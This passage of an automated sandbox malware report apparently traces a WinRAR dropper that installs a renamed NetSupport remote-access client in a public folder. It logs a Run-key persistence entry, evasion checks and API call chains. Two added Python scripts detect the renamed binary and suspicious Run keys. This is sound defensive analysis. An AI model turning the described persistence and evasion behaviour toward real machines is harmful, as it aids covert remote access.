                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\Desktop\file.exe | File written: C:\Users\Public\Public\Videos\Video\client32.ini
Source: C:\Users\Public\Public\Videos\Video\bild.exe | File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: file.exe | Static file information: File size 2138286 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\Public\Videos\Video\msvcr100.dll
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: file.exe
Source: Binary string: msvcr100.i386.pdb | source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.3582942113.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1835584954.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1916341976.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb | source: bild.exe, 00000004.00000002.3583091798.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1835772057.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1916559157.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb | source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN | source: PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL | source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb | source: bild.exe, 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb | source: TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb | source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb | source: bild.exe, 00000004.00000002.3583184483.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1835885776.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1916704363.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP | source: TCCTL32.DLL.0.dr
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\__tmp_rar_sfx_access_check_6205828
Source: PCICL32.DLL.0.dr | Static PE information: section name: .hhshare
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041D8B6 push ecx; ret 0_2_0041D8C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041CDF0 push eax; ret 0_2_0041CE0E
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1116F055 push ecx; ret 4_2_1116F068
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11169F49 push ecx; ret 4_2_11169F5C
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1116F055 push ecx; ret 5_2_1116F068
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
Source: msvcr100.dll.0.dr | Static PE information: section name: .text entropy: 6.909044922675825
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\bild.exe (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\PCICL32.DLL (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\remcmdstub.exe (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\pcicapi.dll (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\msvcr100.dll (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL (dropped file)
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL (dropped file)
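The PDB strings above (every NetSupport component built under E:\nsmsrc\nsm\...) and the dropped-file list together give a quick triage rule: the file set is a stock NetSupport Manager client, and bild.exe carries client32.pdb, so it is client32.exe renamed. The script below is an added example, not part of this report or of Joe Sandbox; it pulls the CodeView RSDS path out of a PE by scanning for the signature (a coarser method than walking the debug directory, chosen to avoid a PE-parser dependency), then flags binaries whose PDB name differs from their on-disk name. The component list and the "four components" threshold are assumptions; the PE blobs are constructed stand-ins, real samples would be read from disk.

```python
"""Triage helper for a dropped NetSupport Manager client set: recognise the
component file names and read the CodeView (RSDS) PDB path out of each PE to
spot a client32.exe that has been renamed (here: bild.exe)."""
import re
import struct
from typing import Dict, List, Optional, Tuple

# File names dropped next to the client in this report. Treating any four of
# them as "a NetSupport client install" is a triage threshold chosen here.
NETSUPPORT_COMPONENTS = {
    "pcicl32.dll", "htctl32.dll", "tcctl32.dll", "pcichek.dll",
    "pcicapi.dll", "remcmdstub.exe", "client32.ini", "msvcr100.dll",
}
# Build-tree prefix shared by every NetSupport PDB path in the report.
NSM_PDB_PREFIX = re.compile(r"^[A-Za-z]:\\nsmsrc\\nsm\\", re.IGNORECASE)


def extract_pdb_path(pe_bytes: bytes) -> Optional[str]:
    """Return the PDB path from the first CodeView RSDS record, or None.

    RSDS layout: 'RSDS' signature (4 bytes), GUID (16), age (4), then a
    NUL-terminated ANSI path. Scanning the raw image for the signature is
    coarser than walking IMAGE_DIRECTORY_ENTRY_DEBUG but needs no PE parser.
    """
    idx = pe_bytes.find(b"RSDS")
    if idx < 0:
        return None
    start = idx + 4 + 16 + 4
    end = pe_bytes.find(b"\x00", start)
    if end < 0:
        return None
    try:
        return pe_bytes[start:end].decode("ascii")
    except UnicodeDecodeError:
        return None


def stem(name: str) -> str:
    """Lower-cased file name without directory or extension."""
    return name.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()


def classify_drop(dir_listing: List[str], pe_blobs: Dict[str, bytes]) -> dict:
    """Score the dropped-file set and list NetSupport binaries whose PDB
    name differs from their on-disk name."""
    present = sorted({n.lower() for n in dir_listing} & NETSUPPORT_COMPONENTS)
    renamed: List[Tuple[str, str]] = []
    for fname, blob in pe_blobs.items():
        pdb = extract_pdb_path(blob)
        if pdb and NSM_PDB_PREFIX.match(pdb) and stem(pdb) != stem(fname):
            renamed.append((fname, pdb))
    return {
        "components_present": present,
        "is_netsupport_set": len(present) >= 4,
        "renamed_binaries": renamed,
    }


def fake_pe(pdb_path: str) -> bytes:
    """Constructed stand-in for a PE image: header bytes, one RSDS record,
    padding. Real samples would be read with open(path, 'rb').read()."""
    guid, age = b"\x11" * 16, struct.pack("<I", 1)
    return b"MZ" + b"\x90" * 64 + b"RSDS" + guid + age + pdb_path.encode() + b"\x00" * 16


# Directory listing and PDB paths as in this report; the PE blobs are constructed.
SAMPLE_DIR = ["bild.exe", "PCICL32.DLL", "remcmdstub.exe", "pcicapi.dll", "HTCTL32.DLL",
              "msvcr100.dll", "PCICHEK.DLL", "TCCTL32.DLL", "client32.ini"]
SAMPLE_PES = {
    "bild.exe": fake_pe(r"E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb"),
    "PCICL32.DLL": fake_pe(r"E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb"),
}

if __name__ == "__main__":
    print(classify_drop(SAMPLE_DIR, SAMPLE_PES))
```

On the sample set the result marks the directory as a NetSupport client install and lists bild.exe as the one renamed binary; PCICL32.DLL keeps its own name and is not flagged.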
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11127E10
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (value: Netstat)
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (value: Netstat)
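The two reg.exe events above are what the Sigma rule "New RUN Key Pointing to Suspicious Folder" fires on: an autostart value written by a command-line tool rather than an installer, naming a binary under C:\Users\Public. The following detection is an added example, not Sigma's or Joe Sandbox's logic; it evaluates Sysmon-style registry-set events with two independent reasons (target path in a user-writable drop folder, value written by a living-off-the-land binary). The folder list and writer list are assumptions, and so is the value data of the first event, since the report shows the key and value name but not the data.

```python
"""Detect Run-key persistence that points into user-writable drop folders,
run over constructed Sysmon-style (Event ID 13) registry events."""
import re
from dataclasses import dataclass
from typing import List, Tuple

RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\[^\\]+$",
    re.IGNORECASE,
)
# Directory fragments a legitimate installer rarely uses for an autostart
# target; the list is an assumption, seeded with the drop path in this report.
SUSPICIOUS_DIRS = [
    "c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\programdata\\",
    "\\videos\\", "\\music\\", "\\pictures\\", "c:\\windows\\temp\\",
]
# Writers that are not installers: a Run value set by one of these deserves a
# look whatever the target path.
LOLBIN_WRITERS = {"reg.exe", "powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


@dataclass
class RegEvent:
    image: str          # process that wrote the value
    target_object: str  # full key path including the value name
    details: str        # value data, i.e. the command that will autostart


def first_path(details: str) -> str:
    """Return the executable path from value data, honouring a quoted path."""
    d = details.strip()
    if d.startswith('"') and d.find('"', 1) > 0:
        return d[1:d.find('"', 1)]
    return d.split(" ")[0]


def evaluate(ev: RegEvent) -> List[str]:
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons: List[str] = []
    if not RUN_KEY.search(ev.target_object):
        return reasons
    target = first_path(ev.details).lower().replace("/", "\\")
    if any(frag in target for frag in SUSPICIOUS_DIRS):
        reasons.append("run_key_to_suspicious_folder")
    if ev.image.rsplit("\\", 1)[-1].lower() in LOLBIN_WRITERS:
        reasons.append("run_key_written_by_lolbin")
    return reasons


def scan(events: List[RegEvent]) -> List[Tuple[str, List[str]]]:
    """Return (target_object, reasons) for every event that triggers."""
    out = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            out.append((ev.target_object, reasons))
    return out


# Constructed events. The first mirrors this report (reg.exe, HKCU Run, value
# "Netstat"); its value data is an assumption, the report does not show it.
EVENTS = [
    RegEvent(r"C:\Windows\SysWOW64\reg.exe",
             r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat",
             r'"C:\Users\Public\Public\Videos\Video\bild.exe"'),
    RegEvent(r"C:\Windows\System32\msiexec.exe",
             r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
             r'"C:\Program Files\Vendor\agent.exe" /background'),
    RegEvent(r"C:\Windows\explorer.exe",
             r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update",
             r"C:\Users\alice\AppData\Local\Temp\upd.exe"),
    RegEvent(r"C:\Windows\SysWOW64\reg.exe",
             r"HKEY_CURRENT_USER\Environment\Path",
             r"C:\Users\alice\bin"),
]

if __name__ == "__main__":
    for key, why in scan(EVENTS):
        print(key, why)
```

Keeping the two reasons separate matters in practice: the installer-written HKLM value is silent, the Temp-folder value fires on the path alone, and the report's reg.exe event fires on both, which is the combination worth paging on.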
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115B1D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113290
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB2B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_110254A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_110258F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_11023BA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024280
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11112670 IsIconic,GetTickCount,4_2_11112670
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111229D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C0BB0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C0BB0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_11143570
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110B8200 Sleep,ExitProcess,4_2_110B8200
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Window / User API: threadDelayed 939
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\remcmdstub.exe
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision (graph_4-58898)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision (graph_4-62976)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision (graph_4-62937)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evaded block: after key decision
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_4-63069)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_4-62869)
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API coverage: 6.3 %
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API coverage: 2.6 %
Source: C:\Users\Public\Public\Videos\Video\bild.exe TID: 7760 | Thread sleep time: -93900s >= -30000s
Source: C:\Users\Public\Public\Videos\Video\bild.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0040A273
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0041A537
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
